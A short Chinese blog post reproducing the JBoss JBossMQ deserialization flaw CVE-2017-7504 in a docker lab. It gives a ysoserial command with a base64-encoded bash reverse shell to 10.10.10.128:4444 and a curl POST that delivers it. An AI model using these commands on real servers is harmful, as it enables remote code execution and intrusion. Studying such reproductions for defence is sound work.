JBoss 4.x JBossMQ JMS 反序列化漏洞（CVE-2017-7504）

Red Hat JBoss Application Server是一款JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中，JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServer1LServlet.java文件存在反序列化漏洞，远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

cd jboss/CVE-2017-7504
docker-compose up -d

漏洞复现

1. 将要反弹的shell使用网站进行编译
2. 使用ysoserial工具

java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMjgvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser

3. 将生成的poc.ser当中POST中的数据

curl http://10.10.10.10:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @poc.ser

反弹成功！

本栏目推荐文章
• OFBiz RCE漏洞复现（CVE-2023-51467）
• CVE-2023-34050 Spring AMQP Deserialization Vulnerability
• CVE-2020-11800
• P8649 [蓝桥杯 2017 省 B] k 倍区间
• ActiveMQ RCE CVE-2023-46604分析
• CVE-2023-36025 Windows SmartScreen 安全功能绕过漏洞
• P3823 [NOI2017] 蚯蚓排队
• P4657 [CEOI2017] Chase 题解
• NGINX文件名漏洞(CVE-2013-4547)
• ZJOI 2017 树状数组

2017 7504 CVE2017 7504 cve 12149 2017 cve 漏洞2017 7921 cve 漏洞2017 6920 cve 10271 2017 cve weblogic 10271 2017 cve dnstracer 2017 9430 cve cve 2017 apache-httpd漏洞 命令cve 2017 h2database 7504